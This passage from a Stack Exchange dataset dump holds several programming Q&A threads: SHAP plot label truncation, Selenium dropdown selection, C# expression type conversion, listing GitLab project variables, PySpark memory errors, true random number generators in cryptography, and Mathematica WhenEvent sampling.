sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.30, random_state = 2100, stratify = y)\n\n# import XGBClassifier\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error\nDM_train = xgb.DMatrix(data = X_train, \n label = y_train)\n \n \nDM_test = xgb.DMatrix(data = X_test,\n label = y_test)\n\nxgb_param_grid = {\n 'colsample_bytree': np.linspace(0.5, 0.9, 2),\n 'n_estimators':[30],\n 'max_depth': [5],\n 'learning_rate':[0.01],\n 'alpha':[10],\n 'objective':['binary:logistic'],\n 'tree_method':['hist'],\n 'min_child_weight': [1],\n 'gamma': [0.5],\n 'subsample': [0.6],\n\n}\n\n \n# instantiate the classifier \nxgb_clf = xgb.XGBClassifier(use_label_encoder=False, eval_metric=\"auc\")\n\n# perform 5 fold cross-validation using mean square error as a scoring method\ngrid_mse = GridSearchCV(estimator = xgb_clf, param_grid = xgb_param_grid, scoring = 'neg_mean_squared_error', cv = 5, verbose = 1)\n\n# Fit grid_mse to the data, get best parameters and best score (lowest RMSE)\n\ngrid_mse.fit(X_train, y_train)\n\nprint(\"Best parameters found: \",grid_mse.best_params_)\nprint(\"Lowest RMSE found: \", np.sqrt(np.abs(grid_mse.best_score_)))\n\n#Predict using the test data\n\ny_pred = grid_mse.predict(X_test)\ny_pred_prob = grid_mse.predict_proba(X_test)\n\nprint(\"Root mean square error for test dataset: {}\".format(np.round(np.sqrt(mean_squared_error(y_test, y_pred)), 2)))\n\nfrom sklearn.metrics import accuracy_score, roc_curve, auc,recall_score,precision_score, precision_recall_curve,f1_score, classification_report, confusion_matrix,roc_auc_score\n\nprint('XGBoost model accuracy score: {0:0.4f}'. format(accuracy_score(y_test, y_pred)))\nprint('XGBoost model F1 score: {0:0.4f}'. format(f1_score(y_test, y_pred, average='weighted')))\n\nprecision, recall, thresholds = precision_recall_curve(y_test, y_pred)\narea = auc(recall, precision)\nprint(\"----------------\")\nprint(\"\\n\\n Evaluation Metrics \\n\\n\")\n\naucroc_score = roc_auc_score(y_test, y_pred_prob[:,1])\nprint(\"Area Under ROC Curve: \",aucroc_score)\n# roc curve for models\nfpr, tpr, thresh = roc_curve(y_test, y_pred_prob[:,1], pos_label=1)\n\n# roc curve for tpr = fpr \nrandom_probs = [0 for i in range(len(y_test))]\np_fpr, p_tpr, _ = roc_curve(y_test, random_probs, pos_label=1)\n\nprint(\"confusion_matrix \", confusion_matrix(y_test,y_pred))\nprint(\"classification_report \", classification_report(y_test,y_pred))\n\nexplainer = shap.TreeExplainer(grid_mse.best_estimator_)\nshap_values = explainer(X_train)\nshap.plots.beeswarm(shap_values, plot_size = 1.8, max_display = 13)\n\nprint(grid_mse.best_estimator_.feature_importances_)\nfor col,score in zip(X_train.columns,grid_mse.best_estimator_.feature_importances_):\n print('%s, %0.3f ' %(col,score))\n<\/code>\n\nI have long feature names and I plot the beeswarm shapley plots and feature names get truncated. I would like the full feature name to be displayed on y-axis. Any help would be greatly appreciated.\nI have tried changing the plot size but it did not work.\nComment: Please [reprex]\nComment: @SergeyBushmanov I have now added the MWE. kindly have a look.\nComment: What's your environment? Because in jupyter notebook arbitrarily long feature names are displayed correctly.\nComment: I use python3.6 in Ubuntu. I do not use Jupyter notebook.\nComment: Then i will conclude its not an issue with shap package which plots fine here. Rather its your ide or matplotlib plotting backend\nComment: yes i have tried in the .pynb and it's working fine. But i would like to know what can be done with matplotlib plotting backend to fix the issue if i do not want to use the noteboooks?\nAnswer: Add a flag to hide the plot. Then save to output with tight bbox layout:\n<code>path = 'save_path_here.png'\nshap.plots.beeswarm(shap_values, plot_size = 1.8, max_display = 13, show=False)\nplt.savefig(path, bbox_inches='tight', dpi=300)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Shap plot crops\/truncates the feature names","dup_signals":{}},"subset":"stackexchange"} +{"text":"Not able to identify the element in dropdown\n\nQuestion: enter image description hereenter image description hereI have a drop down, and click will display the list of branches.\nI am able to identify the drop down(arrow inverted in ui) and click on it, by using below code.\n<code>\/\/click on the drop down\n@FindBy(xpath =\"\/\/[@id=\\\"miniTable\\\"]\/tbody\/tr[5]\/td[1]\/div\/div\/div[1]\")\nWebElement selectbranch;\n<\/code>\nNote that ,There is no select tag for the drop down\nIssue:\nI am able to identify the drop down and click on that, But I am not able to get one of the branch from the drop down.\nComment: Can you please share the html of the dropdown item.\nAnswer: Since your Drop down has not made of <code>Select<\/code> tag, <code>Select<\/code> class from selenium will not work.\nAs you have mentioned that you are able to click on drop down, you can use this code after that : \n<code>List<WebElement> options = driver.findElements(by.xpath(\" your locator\"));\nfor(WebElement element : options){\n if(element.getText().equals(\" the value you want to select from drop down\")){\n element.click();\n}\n}\n<\/code>\nin place of <code>your locator<\/code> , you'd have to give a common locator for all the elements of drop down. \nLet me know if you have any more concerns.\nComment: my concern is, when a click on the drop down, i can't see the list of branches in the html tag, only when i click on any branch manually,i could see the branch name in the html code\nComment: @saidayapule : So, write the locator that should be common for all the option, You don't really have a choice here since select tag is not present in HTML\nComment: yes to write a locator common to all the options, i should be able to idenitfy, but, when i click on the drop down(right click, inspect element), i am able to find locator for the drop down, but no locator for the list of branches, please see the images attached\n","meta":{"source":"stackoverflow","title":"Not able to identify the element in dropdown","dup_signals":{}},"subset":"stackexchange"} +{"text":"The binary operator Multiply is not defined for the types 'System.Int32' and 'System.Double'.\n\nQuestion: Why the following code throws an exception at runtime, whereas doing it in the traditional way compiles without problem?\n<code>var left = Expression.Constant(25d);\nvar right = Expression.Constant(20);\n\n\/\/ Throws an InvalidOperationException!\nvar multiplyExpression = Expression.Multiply(left, right); \n\nvar multiply = 25d * 20;\nDebug.WriteLine(multiply.ToString()); \/\/ Works normally!\n<\/code>\nI won't use <code>Expression.Convert<\/code> since I can't determine exactly which expression should be converted.\nComment: Because in the traditional way, the compiler inserts the (moral equivalent of) an `Expression.Convert` - using type precedence rules to determine which side to convert.\nComment: Just check the type of \"multiply\", that will tell you which side needs converted.\nComment: Which expression would the C# compiler have converted in this case?\nAnswer: Well, I figured out how to solve the problem using TypeCode enumeration to determine which node would have higher type precision, then convert the latter node's type to the former's type, and vice versa:\n<code> private static void Visit(ref Expression left, ref Expression right)\n {\n var leftTypeCode = Type.GetTypeCode(left.Type);\n var rightTypeCode = Type.GetTypeCode(right.Type);\n\n if (leftTypeCode == rightTypeCode)\n return;\n\n if (leftTypeCode > rightTypeCode)\n right = Expression.Convert(right, left.Type);\n else\n left = Expression.Convert(left, right.Type);\n }\n<\/code>\nComment: Oh dam... TypeCode isn't available on Windows Store. so close... ;(\nAnswer: <code>var left = Expression.Constant(25d);\nvar right = Expression.Constant(20);\nvar multiplyExpression = Expression.Multiply(\n left, \n Expression.Convert(right, left.Type)); \n<\/code>\nOr, if you don't know that the left side has higher precision, and you want to always end up with a <code>double<\/code> result, you could say something like:\n<code>Expression left = Expression.Constant(2);\nExpression right = Expression.Constant(25.1);\nleft = Expression.Convert(left, typeof(double));\nright = Expression.Convert(right, typeof(double));\nvar multiplyExpression = Expression.Multiply(left, right); \n<\/code>\nComment: @Islam Ibrahim: There are a number of possibilities, and it's usually best to go with the simplest strategy that will work for your purposes. Perhaps if you share more information on your requirements, and what this is used for, we could help you find a solution to match. For example, do you know what type you want to end up with ahead of time, or will that change depending on the inputs?\nComment: Well, this looks good, but how could this be done if the operands are of type float, decimal?\nAnswer: Well the error message in your title is telling you why there is an exception.\nThere is no <code>Expression.Multiply<\/code> method defined which takes a <code>System.Int32<\/code> and a <code>System.Double<\/code> as arguments.\nThe <code>*<\/code> will work because it's lower level and your values will be type cast automatically.\nAnswer: <code>var left = Expression.Constant(25d);\nvar right = Expression.Constant((double)20);\n\nvar multiplyExpression = Expression.Multiply(left, right); \/\/ works\n<\/code>\nComment: This can't be done directly, I should call Expression.Convert somehow.\n","meta":{"source":"stackoverflow","title":"The binary operator Multiply is not defined for the types 'System.Int32' and 'System.Double'.","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to list all the project variables in a gitlab project via GitLab V4 api\n\nQuestion: I'd like to list all the project variables in a gitlab project. I have followed their official documentation but seems like I couldn't get it to work.\nBelow is my code:\n<code>import gitlab, os\n\n# authenticate\ngl = gitlab.Gitlab('https:\/\/gitlab.com\/', private_token=os.environ['GITLAB_TOKEN'])\n\ngroup = gl.groups.get(20, lazy=True)\nprojects = group.projects.list(include_subgroups=True, all=True)\nfor project in projects:\n project.variables.list()\n<\/code>\nError:\n\nAttributeError: 'GroupProject' object has no attribute 'variables'\nAnswer: The problem is that <code>group.list<\/code> uses the groups list project API and returns <code>GroupProject<\/code> objects, not <code>Project<\/code> objects. <code>GroupProject<\/code> objects do not have a <code>.variables<\/code> manager, but <code>Project<\/code> objects do.\nTo resolve this, you must extract the ID from the <code>GroupProject<\/code> object and call the projects API separately to get the <code>Project<\/code> object:\n<code>group = gl.groups.get(20, lazy=True)\ngroup_projects = group.projects.list(include_subgroups=True, all=True)\nfor group_project in group_projects:\n project = gl.projects.get(group_project.id) # can be lazy if you want\n project.variables.list()\n<\/code>\nComment: Thanks!! That worked. I'm specifically looking to list protected variables only, instead of all the vars. Do you if there is a special param for that? I have tried `project.variables.list(protected=True)` but that didn't work.\nComment: As far as I know, there is no filtering for that in the [list API itself](https:\/\/docs.gitlab.com\/ee\/api\/project_level_variables.html) (therefore no such keyword parameter in the Python API wrapper) but it is relatively simple to do that filtering in python: `protected_variables = [var for var in project.variables.list(all=True) if var.protected is True]` @blackPanther\nComment: Great, it did the trick, thanks! now `protected_variables` is a list of classes like `[, ]`, whereas I'm just looking for `[API_TOKEN, WEBHOOK_URL]`\nComment: @blackPanther those are _instances_, not classes. You can extract the information you want from the object. For example `var.value` -- if I've answered your original question, please consider voting and accepting it. If you still need more help beyond that, consider raising a separate question.\nAnswer: According to the FAQ:\n\nI get an <code>AttributeError<\/code> when accessing attributes of an object retrieved via a <code>list()<\/code> call.\nFetching a list of objects, doesn't always include all attributes in the objects. To retrieve an object with all attributes use a <code>get()<\/code> call.\n\nAdapting the example to your code:\n<code>for project in projects:\n project = gl.projects.get(project.id)\n project.variables.list()\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to list all the project variables in a gitlab project via GitLab V4 api","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fix PySpark, jdk memory -issue?\n\nQuestion: I seem to have a memory problem using PySpark's ML package. I am Trying to use ALS.fit on a 40 million rows dataframe. Using JDK-11 produced the error: \n<code>\"java.lang.NoSuchMethodError: sun.nio.ch.DirectBuffer.cleaner()Lsun\/misc\/Cleaner\" \n<\/code>\nIt worked with 13 million rows, so I guess its a memory cleaning issue.\nI tried it using java JDK-8, like proposed here: \nApache Spark method not found sun.nio.ch.DirectBuffer.cleaner()Lsun\/misc\/Cleaner; \n, but I still run into an error, because heap Memory doesnt suffice: I get this error message: \n<code>\"... java.lang.OutOfMemoryError: Java heap space ...\"\n<\/code>\nSomeone has an idea how to circumvent this?\nI am using Ubuntu 18.04 LTS and Python 3.6 and PySpark 2.4.2 .\nedit: \nthis is how I patched together my Spark Context configuration: \n\nI have 16 gb of RAM\n\n<code>conf = spark.sparkContext._conf.setAll([\n (\"spark.driver.extraJavaOptions\",\"-Xss800M\"),\n (\"spark.memory.offHeap.enabled\", True),\n (\"spark.memory.offHeap.size\",\"4g\"),\n ('spark.executor.memory', '4g'), \n ('spark.app.name', 'Spark Updated Conf'),\n ('spark.executor.cores', '2'), \n ('spark.cores.max', '2'),\n ('spark.driver.memory','6g')])\n<\/code>\nI'm not sure if this makes sense!\nThese are the first lines of the error message: \n<code>[Stage 8:==================================================> (186 + 12) \/ 200]19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_196 in memory! (computed 3.6 MB so far)\n19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_192 in memory! (computed 5.8 MB so far)\n19\/07\/02 14:43:29 WARN BlockManager: Persisting block rdd_37_192 to disk instead.\n19\/07\/02 14:43:29 WARN BlockManager: Persisting block rdd_37_196 to disk instead.\n19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_197 in memory! (computed 3.7 MB so far)\n19\/07\/02 14:43:29 WARN BlockManager: Persisting block rdd_37_197 to disk instead.\n19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_196 in memory! (computed 3.6 MB so far)\n[Stage 8:======================================================>(197 + 3) \/ 200]19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_192 in memory! (computed 5.8 MB so far)\n[Stage 9:> (0 + 10) \/ 10]19\/07\/02 14:43:37 WARN BlockManager: Block rdd_40_3 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_40_4 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_40_7 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_41_3 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_41_4 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_41_7 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:38 ERROR Executor: Exception in task 7.0 in stage 9.0 (TID 435)\njava.lang.OutOfMemoryError: Java heap space\n19\/07\/02 14:43:39 WARN BlockManager: Block rdd_40_5 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:38 ERROR Executor: Exception in task 4.0 in stage 9.0 (TID 432)\njava.lang.OutOfMemoryError: Java heap space\n at scala.collection.mutable.ArrayBuilder$ofInt.mkArray(ArrayBuilder.scala:327)\n[...]\n<\/code>\nComment: How did you solve this problem? I am having the same problem while saving the dataframe.\nAnswer: Eventually you probably want to expand memory heap with the help of -Xmx parameter.\nYou can determine how much memory it needs using various methods. You can simply increase heap until it works, or you can define very large heap and then see how much of it is used and make it proper.\nYou can monitor heap usage with different ways, for example:\n\nrun your application with options to write garbage collection log -XX:+PrintGCTimeStamps -XX:+PrintGCDetails -verbose:gc -Xloggc:\/some_path\/gc.log\nrun your application with command line option: -XX:NativeMemoryTracking=summary or -XX:NativeMemoryTracking=detail and use jcmd utility: jcmd VM.native_memory summary\nor some other way, even using graphical utilities, just google it if you need it.\nComment: Thanks, how exactly do I use the -XmX parameter?\n\nI edited my question with my newly added conf call to spark context.\nComment: Unfortunately I know nothing about PySpark. Maybe you should add this parameter to spark.driver.extraJavaOptions, or maybe there is some other PySpark option for that. If you just run java program, you simply add it to the command line.\n","meta":{"source":"stackoverflow","title":"How to fix PySpark, jdk memory -issue?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the use of REAL random number generators in cryptography?\n\nQuestion: I understand the use of pseudo-random number generators. I am not getting mixed up between these and \"real\" random number generators.\nHowever, I don't understand for what a real random number generator is used.\nIf it is not deterministic, how can it be used in an algorithm?\nComment: You need a real random number generators to seed the pseudo-random number generator. Additionally, most *true* random number generators require post-processing of the random output, which is often done using pseudo-random generators.\nComment: @jug Yup, entropy sources may even have a particular bias to bits valued 0 or 1. Normally you need at least a whitening technique to get something looking like a random number. Feeding that as a seed into a PRNG is certainly helping to get the right quality. Be careful not to confuse a source of entropy with a secure random number generator.\nAnswer: For some types of algorithms (or protocols) we only need non-guessable (by the attacker) bits\/numbers, not reproducible non-guessable ones (like from a deterministic PRNG).\nIn this cases, \"real\" random numbers are in theory (i.e. from an information-theoretic point of view, not a cryptographic one) better, since they can't be guessed (or even influenced) by an attacker, even if she could break our PRNG.\nSome cases that I can now think of, where we don't need deterministic random numbers:\n\nkey generation (both symmetric and asymmetric)\ninitialization vectors for block cipher modes of operation (these are usually sent with the message, so the same plaintext will not result in recognizable ciphertext for the next message)\nrandom padding in asymmetric encryption (for example OAEP)\nsalts for password storage (these are stored with the hash)\nchallenges in zero knowledge proofs (sent to the partner)\nrandom values used in digital signatures (the <code>k<\/code> in DSA)\none time pads (OTP) (Here, for the security proof, we actually need \"real\" random numbers.)\nchaffing and winnowing\n\nIn practice, pseudo-random bits are cheaper and just as secure for real-world attackers (e.g. with resources limited by our earth mass and universe lifetime), as long as the PRNG is not broken and has enough entropy input to start with.\n(If the attacker can control the seemingly random input to the \"true random\" generator, this would be even worse than a good PRNG.)\nOften for these uses we use a combination of a cryptographically secure (deterministic) PRNG and an entropy pool, which gets filled (and re-filled) by random bits gathered by the OS. This would be a non-deterministic PRNG.\nComment: So basically the use for a REAL random number generator is for creating random bits, to reduce entropy, because humans cannot think of data that is truly random\nComment: to *increase* entropy.\nAnswer: Many of the uses of a True RNG fall into the general category of generation, without persistent storage, of a value that is different with high probability from any value determined otherwise.\nA value that is different with high probability from any value determined otherwise is very useful in cryptographic protocols. For example, under classic CBC encryption with multiple messages enciphered with the same key, an IV needs to be distinct from a previous IV (which is necessary to conceal a possible repeat of the plaintext), and distinct from the XOR of the first block of plaintext with any value that has or will ever enter the input of the block cipher (which is necessary to ensure confidentiality of that first block of plaintext under the assumption that all other plaintext is known).\n\"Without persistent storage\" requirement rules out a Pseudo RNG, and greatly simplify things: in the case of PRNG, persistent storage needs to be made confidential and\/or integrity-protected, which is plain impossible on a regular PC under the basic \"maid boots USB stick\" security threat. Sometime there is just no persistent storage (boot from CD-ROM), or it is a bit slow.\nAnother reason to use a True RNG is protection of the implementation of a cryptographic algorithm from side-channel attacks, a process often called \"masking\". For example, protection against DPA of the crypto-engines used in Smart Cards uses random data for that purpose. Using a Pseudo RNG here would create a chicken-and-egg problem (since secure PRNGs use cryptographic algorithms); while this might be solvable, it is simply easier and much faster to use a TRNG.\nAnswer: That's the whole point. With a pseudo-random number generator, one is able to (theoretically) repeat the same sequence of numbers that appear to have been chosen at random (one just needs to know the seed), while with a true random number generator they can not (one needs to know all bits of output).\nThis is useful for generating private keys of symmetric and asymmetric cryptosystems. By using a true random number generator, the cryptanalyst is not able to guess the private key as easily using a brute force attack. (Of course, if the seed and state of the PRNG is large enough, there is practically no way to do it, too.) This is why it pays to re-seed your (pseudo) random number generator every time you generate a private key.\n","meta":{"source":"crypto.stackexchange","title":"What is the use of REAL random number generators in cryptography?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Force WhenEvent to respect default stepsize\n\nQuestion: I have to numerically integrate an equation system and monitor the accumulating datapoints. For example, I fit a line to a subsample of the points and terminate via <code>\"StopIntegration\"<\/code> if fitted line has ~0 slope. However, when I define a regular sampling time for <code>WhenEvent<\/code> (<code>Mod[t, 1]<\/code>), the collected log values have huge errors.\n<code>ode = {\n x'[t] == -.2 x[t]^2 + 2 y[t],\n y'[t] == x[t] + .1 x[t]^2 - 1.5 y[t],\n x[0] == y[0] == 1,\n WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}]]]\n };\n\nevents = steps = {};\nif = NDSolveValue[ode, {x, y}, {t, 0, 200}, StepMonitor :> AppendTo[steps, {t, Log@x@t}]];\n\nLogPlot[Through@if@t, {t, 0, 200}, Epilog -> {\n {Blue, AbsolutePointSize@6, Point@steps},\n {Red, AbsolutePointSize@3, Point@events}\n }, ImageSize -> 500]\n<\/code>\n\nI can see two ways to overcome this. 1) Set a method for <code>NDSolve<\/code> with uniform known stepsize and make the <code>WhenEvent<\/code> test at the same times. For certain reasons I want to avoid this. For one, it's nice to rely on the automatic adaptive stepsize algorithm. 2) Force <code>WhenEvent<\/code> to only evaluate when an internal step is taken by the integrator without modifying the step size manually. I failed to achieve this reliably. How to do this?\nAs you can see, it's perfectly unnecessary to increase accuracy\/precision, as at <code>steps<\/code> the solution values are correct and I don't need to have extra values in between them. Note, that I cannot use <code>StepMonitor<\/code> solely, as I have to stop integration when a condition is met (based on the collected points).\nDetails\nThe problem is in the way Mathematica calculates solution values but not via the actual integrator method: when a value is calculated, <code>WhenEvent<\/code> interface does not know where the next point will be, so it has to extrapolate. It just does it in a horrible way. Somewhere in the process the actual derivative is lost, or even worse, a constant derivative is assumed, resulting in wild errors. See the following, even simpler example:\n<code>Block[{events = {}, steps = {}, if, x, t},\n if = NDSolveValue[{x'[t] == -1\/10 x[t], x[0] == 1, \n WhenEvent[Mod[t, #] == 0., AppendTo[events, {t, x[t]}]]}, \n x, {t, 0, 100},\n StepMonitor :> {AppendTo[steps, t]}, \n Method -> \"ExplicitRungeKutta\"(*,WorkingPrecision -> 50*)];\n Plot[if@t, {t, 0, 100}, \n Epilog -> {Green, Point@events}, \n PlotRange -> {All, {1, -1}}, GridLines -> {steps, {0}}, \n PlotLabel -> Row@{\"d = \", #}]\n ] & \/@ {10, 1, 1\/10, 1\/100}\n<\/code>\n\nVertical gridlines indicate internal steps, green points are the detected events. If you uncomment the option <code>WorkingPrecision -> 50<\/code>, the result is what one would expect - at the cost of at least double time required and I had to convert all reals to exact numbers.\nUpdate\nAccording to TechSupport, there is no way at the moment to evaluate a <code>WhenEvent<\/code> test only when the integrator takes a step. Maybe in a future version.\nComment: @ChrisK Sure: you can fit a line to a large sample of points, but the derivative is checked at a point. For certain cases, I want to check whether the last 10000 datapoints are equilibrated (slope ~ 0) or in exponential decay (slope is of log.values is negative). Furthermore, my solution could heavily oscillate, while still could be a limit cycle.\nComment: Just a note, the Log doesn't seem to matter - same problem without it.\nComment: Is there a reason you want to fit a line to points to estimate the slope rather than using something like `WhenEvent[Abs[x'[t]] < 10^-4, \"StopIntegration\"]`?\nComment: I see, thanks! That sounds generally useful, I'd be happy if you posted the final product.\nComment: @MichaelE2 I am aware of this method but try to collect more than one point this way. The problem is that whenever the test of the `WhenEvent` becomes true, it won't check that test any more, even if you reset the flag.\nAnswer: This is interesting even if it's not a perfect answer. It makes me suspect a bug somewhere.\nI thought, for reasons that elude me -- it just occurred to me to try -- of enforcing a certain checking of <code>x[t]<\/code> by adding a \"trivial\" discrete variable and updating it from time to time. It is trivial in the sense that it never changes value and does not affect the OP's system. I guess in part I thought the variable would force <code>NDSolve<\/code> to track it, and perhaps <code>x[t]<\/code> would be calculated instead of extrapolated (for it seemed that extrapolation might be the explanation of the bad values for <code>x[t]<\/code> in the OP's code). So I changed the first DE to\n<code>x'[t] == -.2 x[t]^2 + 2 y[t] + a[t]\n<\/code>\nwhere <code>a[t] == 0<\/code>.\nI was able to get what I wanted by changing the event action \n<code>WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}], a[t] -> 0]]\n<\/code>\nBut that was a typo. I meant to try the following which did not work:\n<code>WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}]; a[t] -> 0]]\n<\/code>\nI couldn't (and still cannot) explain why one worked and the other failed. I got the following, respectively:\n\nThen I thought, what if the discrete variable <code>a[t]<\/code> was update periodically, but not very often, so that the OP's goal of letting the step size grow somewhat large might might be realized. This is, admittedly, similar to @user21's approach with <code>MaxStepSize<\/code>, but that approach still had \"extrapolation\" errors, albeit much smaller. This is unlike what <code>a[t] -> 0<\/code> produced above (left image):\n\nAccording to my speculative theory, an event of the form <code>WhenEvent[Mod[t, dt] == 0, a[t] -> 0]<\/code>, might cause <code>x[t]<\/code> to be assigned the correct value. (I was beginning to think that extrapolation is not the reason for the wild values in the OP's code.) With <code>dt = 10<\/code> or <code>20<\/code> everything seems to work fine. The value chosen for <code>dt<\/code> seemed to affect the step size (because <code>NDSolve<\/code> is worried that some discontinuous change to the ODE is going to occur at such an event). So I thought, how large can I make <code>dt<\/code>? I found that around <code>85<\/code>, strange things happen.\n<code>ode2 = {x'[t] == -.2 x[t]^2 + 2 y[t] + a[t], \n y'[t] == x[t] + .1 x[t]^2 - 1.5 y[t],\n a[0] == 0, x[0] == y[0] == 1, \n WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}](*,a[t]->0*)]],\n WhenEvent[Mod[t, dt] == 0, a[t] -> 0]};\n\nTable[\n events = steps = {};\n if = NDSolveValue[ode2, {x, y}, {t, 0, 200}, \n StepMonitor :> AppendTo[steps, {t, Log@x@t}], \n DiscreteVariables -> {a}];\n LogPlot[Through@if@t, {t, 0, 200}, \n Epilog -> {{Blue, AbsolutePointSize@6, Point@steps}, {Red, \n AbsolutePointSize@3, Point@events}}, ImageSize -> 250, \n PlotLabel -> HoldForm[dt] == dt],\n {dt, 85, 88}\n ] \/\/ Partition[#, 2] & \/\/ GraphicsGrid\n<\/code>\n\nThree of the plots are have no error message; the upper right one has this error:\n\nCoordinate {171., Complex[0.38451996298641833`, 3.141592653589793]} should be a pair of numbers, or a Scaled or Offset form.\n\nThe error just means that the value of some <code>x[t]<\/code> are negative when <code>dt = 86<\/code>, which in not inconsistent with the graph of the solution. For <code>dt = 85<\/code> or <code>88<\/code>, the values of <code>event<\/code> seem accurate, but in the case of <code>dt = 88<\/code>, there's a little glitch in the solution. As I said, it appears to be buggy (unless someone can explain why this is to be expected).\nIn any case, adding <code>a[t] -> 0<\/code> in\n<code>WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}], a[t] -> 0]]\n<\/code>\nseems to be a workaround, even though I cannot explain why it works. None of these events, it seems to me, should affect the computed solutions to <code>x[t]<\/code> and <code>y[t]<\/code>. But they do.\nComment: Interesting findings, thanks for the analysis! If we can close i on the issue, I'll file it for TechSupport.\nComment: You'd have to use `MaxStepSize`->1; Mod[t,dt] in a `WhenEvent` is documented to sample at dt. Maybe I am missing the point?\nComment: @user21 Doesn't `Mod[t,dt]` **add** a step size every `dt`? I don't know how a `Mod` event affects the adaptive step size. I do notice that when the event action is not null, `NDSolve` does take a step at the event time; however, it takes other steps in between, if the time between events is long enough. I know I'm confused about something. I'm surprised that changing the timing of an event that seems to do nothing affects the quality of the solution. I assume the event action `a[t] -> 0` is treated as a discontinuity and that in turn interferes with the next step in an obscure way.\nComment: **That** is the point: specifying a high-resolution event-condition **does not** (by default) increases the resolution of the adaptive stepsize algorithm. It either should, or there should be a way to only test event conditions when a step is actually taken.\nComment: @Istv\u00e1nZachar You can force `NDSolve` to take a step at each event by having the `WhenEvent` action return `\"RestartIntegration\"` (but I thought you wanted to avoid the extra sampling).\nComment: Yes, that is useful. But what I actually want is the other way around: only evaluate a `WhenEvent` when a step is taken. This seems impossible, unless I specify the step size manually.\nAnswer: One way to do this is not to restrict <code>NDSolve<\/code> to use a fixed size method but to restrict the <code>MaxStepSize<\/code>\n<code>if = NDSolveValue[ode, {x, y}, {t, 0, 200}, \n StepMonitor :> AppendTo[steps, {t, Log@x@t}], MaxStepSize -> 2];\n<\/code>\nSo if you use <code>WhenEvent[Mod[t, dt] == 0....<\/code> I'd think you want <code>MaxStepSize -> dt<\/code>\nFrom the documentation of <code>WhenEvent<\/code>: Mod[t,dt]==0 sample at regular intervals dt in the time variable t. But perhaps I miss the point?\nComment: @Istv\u00e1nZachar, it does not discard the adaptive step size method, it limits it. That's something different.\nComment: I appreciate the effort, but `MaxStepSize` explicitly discards the adaptive step selection method and unnecessarily multiplies step points. Something I rather avoid as I wrote. Emphasized it in my edit.\nComment: You are right, but what I want is not to restrict the default step method in any way, if possible and not to collect too many datapoints.\nAnswer: Here is a potential workaround, that works on the OP's MWE. We'll restart integration at the beginning of logging of events. Since I'm not sure why the OP's code fails, I'm not sure why this fixes it. It potentially adds a step at <code>t == 140<\/code>, and it causes <code>NDSolve<\/code> to calculate a new starting step size. It's hard to know whether this would slow things down in all cases, but it has a negligible effect on the number of steps in the OP's MWE. I'll log the steps in <code>steps2<\/code> and <code>events2<\/code> to compare with the OP.\n<code>ode = {x'[t] == -.2 x[t]^2 + 2 y[t], \n y'[t] == x[t] + .1 x[t]^2 - 1.5 y[t], x[0] == y[0] == 1, \n WhenEvent[Mod[t, 1] == 0, If[140 < t < 200, AppendTo[events2, {t, Log@x@t}]]], \n WhenEvent[t == 140, \"RestartIntegration\"]};\n\nevents2 = steps2 = {};\nif = NDSolveValue[ode, {x, y}, {t, 0, 200}, \n StepMonitor :> AppendTo[steps2, {t, Log@x@t}]];\n\nLogPlot[Through@if@t, {t, 0, 200}, \n Epilog -> {{Blue, AbsolutePointSize@6, Point@steps2}, {Red, \n AbsolutePointSize@3, Point@events2}}]\n<\/code>\n\nThe steps are about the same, with an adjustment at the restart of integration.\n<code>NumberLinePlot[{steps[[All, 1]], steps2[[All, 1]]}, \n GridLines -> {{140}, None}]\n<\/code>\n\nThere is a small error between the computed solution and the event values:\n<code>With[{xif = First@if},\n maxerr = Max@Abs[Differences \/@ MapAt[Log @* xif, events, {All, 1}]]\n ]\n(* 3.81291*10^-10 *)\n<\/code>\nWe can see that this does not really fix the error observed in the OP:\n<code>Show[\n plot = LogPlot[First[if][t], {t, 139, 200}], \n Graphics[{{Blue, AbsolutePointSize@6, Point@steps2}, {Red, \n AbsolutePointSize@3, Point@events2}}],\n PlotRange -> {{139, 200}, Last@PlotRange@plot + maxerr {-1, 1}}]\n<\/code>\n\nNote that the initial slopes of the event arcs are close to the derivative of <code>x[t]<\/code> at <code>t == 140<\/code>, where integration (re)started. A similar pattern may be observed in the OP. This is not strictly true, nor does it seem that each arc starts with the same rate of change.\n<code>SplitBy[Differences@Exp@events2[[All, 2]], Positive][[1 ;; ;; 2, 1]]\nFirst[if]'[140]\n(*\n {6.90459*10^-10, 6.54047*10^-10, 6.05088*10^-10, 6.11475*10^-10}\n 7.31003*10^-10\n*)\n<\/code>\nIf the arcs are connected to <code>x'[140]<\/code>, then this workaround may only work accidentally, as it were, in the OP's MWE.\nComment: Unfortunately, restarting only works if the function does not change much afterwards. I've quite a few cases where restart does not work - especially, if I include the whole range for the `WhenEvent` and not just after `t=140`.\nComment: @Istv\u00e1nZachar I was afraid of that, given my last 